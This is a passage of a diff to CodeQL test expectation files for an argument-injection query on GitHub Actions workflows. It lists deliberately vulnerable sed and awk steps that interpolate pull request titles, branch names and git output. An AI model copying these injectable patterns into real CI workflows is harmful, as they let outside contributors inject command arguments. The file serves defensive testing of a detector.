env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | 
.github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| 
.github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| 
.github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD 
)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 90e7101e5fd6..12171d8c7f27 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
@@ -1,20 +1,23 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | 
.github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| 
.github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| 
.github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log 